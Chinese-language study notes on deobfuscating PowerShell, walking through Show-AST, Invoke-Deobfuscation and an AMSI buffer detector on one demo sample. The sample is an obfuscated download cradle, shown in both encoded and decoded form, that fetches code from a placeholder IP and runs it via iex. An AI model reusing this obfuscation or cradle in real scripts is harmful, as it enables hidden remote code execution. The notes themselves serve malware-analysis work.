内容纲要
原样本:
-joIn('36b105;112v32Y61v32M34R49R34F10v36%105;112v32R43o61k32Y34M48F46R50;34%10v36M105M112M32;43o61;32%34;51k49R46;50%51o34o10R36b105R112%32M43v61b32o34o46v51k52M34M10Y36k109F97o108v119%97F114b101;32%61R32k40F78%101;119M45b79R98;106o101M99M116v32v83b121Y115;116F101R109b46M78o101v116k46M87F101R98R67%108R105Y101M110b116F41F46M68R111R119%110%108M111M97R100R83Y116F114k105F110M103%40;34M104F116Y116k112b58v47o47o36%105F112R47o102M97o107R101;117R114;108o34R41'.SpLiT('RMk;vbFoY%') |FOrEAch{ ([Char] [int] $_) })|& ( $pShomE[21]+$psHOmE[30]+'x')01 使用SHOW-AST
图形视图可视化 PowerShell Ast。
Show the ast of a script or script module
Show-Ast $pshome\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1
Show-Ast ~\Documents\WindowsPowerShell\profile.ps1
Show the ast of a script block
```powershell
Show-Ast { echo -InputObject "Name is $name" }结果:
![[../图片/Pasted image 20230329112755.png]]
02 使用Invoke-Deobfuscation
Import-Module ./Invoke-DeObfuscation.psd1
DeObfuscatedMain -ScriptPath0 ../Data/demo.ps1结果:
PS C:\Users\Lsz\Documents\BaiduSyncdisk\PowerShell反混淆与分类\解混淆\invoke-deobfuscation\Code> Import-Module .\Invoke-DeObfuscation.psd1
PS C:\Users\Lsz\Documents\BaiduSyncdisk\PowerShell反混淆与分类\解混淆\invoke-deobfuscation\Code> DeObfuscatedMain -ScriptPath0 ../Data/demo02.ps1
-joIn('36b105;112v32Y61v32M34R49R34F10v36%105;112v32R43o61k32Y34M48F46R50;34%10v36M105M112M32;43o61;3
2%34;51k49R46;50%51o34o10R36b105R112%32M43v61b32o34o46v51k52M34M10Y36k109F97o108v119%97F114b101;32%61
R32k40F78%101;119M45b79R98;106o101M99M116v32v83b121Y115;116F101R109b46M78o101v116k46M87F101R98R67%108
R105Y101M110b116F41F46M68R111R119%110%108M111M97R100R83Y116F114k105F110M103%40;34M104F116Y116k112b58v
47o47o36%105F112R47o102M97o107R101;117R114;108o34R41'.SpLiT('RMk;vbFoY%') |FOrEAch{ ([Char] [int] $_)
})|& ( $pShomE[21]+$psHOmE[30]+'x')
03 使用AMSI-buffer-detector
结果:
$ip = "1"
$ip += "0.2"
$ip +="31.23"
$ip += ".34"
$malware = (New-Object System.Net.WebClient).DownloadString("http://$ip/fakeurl")